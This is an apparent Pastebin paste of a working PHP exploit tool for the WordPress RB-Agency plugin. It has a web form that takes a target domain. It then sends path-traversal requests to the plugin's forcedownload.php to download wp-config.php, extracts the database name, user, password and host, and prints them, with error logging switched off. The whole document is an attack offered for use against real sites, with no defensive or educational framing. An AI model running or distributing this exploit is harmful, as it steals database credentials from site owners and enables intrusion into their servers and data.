Advertisement
AZZATSSINS_CYBERSERK

WP Plugin RB-Agency AFD

Sep 7th, 2016
240
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.07 KB | None | 0 0
  1. <?php
  2. @session_start();
  3. @error_reporting(0);
  4. @ini_set('error_log',NULL);
  5. @ini_set('log_errors',0);
  6. @ini_set('display_errors', 0);
  7. @set_time_limit(0);
  8. /*
  9. Name app : Wordpress Auto Get DataBase (AFD)
  10. Author / Editor Script : AZZATSSINS CYBERSERKERS
  11. */
  12. echo"<title>WordPress Get Database | RB-Agency</title><center>
  13. <body bgcolor=silver><u><i><b><h1>&copy; AZZATSSINS CYBERSERKERS</h1>
  14. </b></i></u><br>
  15.     <form method='post'>
  16.     Domain: <br>
  17.     <textarea placeholder='http://www.target.com/' name='url' style='width: 500px; height: 20px;'></textarea><br>
  18.     <input type='submit' name='azzatssins' value='GET DB!'>
  19.     </form>";
  20.     $site = $_POST['url'];
  21. if($_POST['azzatssins']) {
  22. echo "<br><u><b>Target : ".$site."</b></u><br>";
  23. $expl = array("/wp-content/plugins/rb-agency/ext/
  24. forcedownload.php?file=../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../../../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../../../wp-config.php");
  25. foreach($expl as $exploit){
  26. $ch = curl_init();
  27. curl_setopt($ch, CURLOPT_URL, "$site/$exploit");
  28. curl_setopt($ch, CURLOPT_HTTPGET, 1);
  29. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  30. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  31. $xp = curl_exec ($ch);
  32. curl_close($ch);
  33. if(preg_match("#DB_USER#i",$xp)){
  34. preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
  35. echo "DB_NAME:{$DB_NAME[1]}<br>";
  36. preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
  37. echo "DB_USER:{$DB_USER[1]}<br>";
  38. preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
  39. echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
  40. preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
  41. echo "DB_HOST:{$DB_HOST[1]}<br>";
  42. }
  43. }
  44. }
  45. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement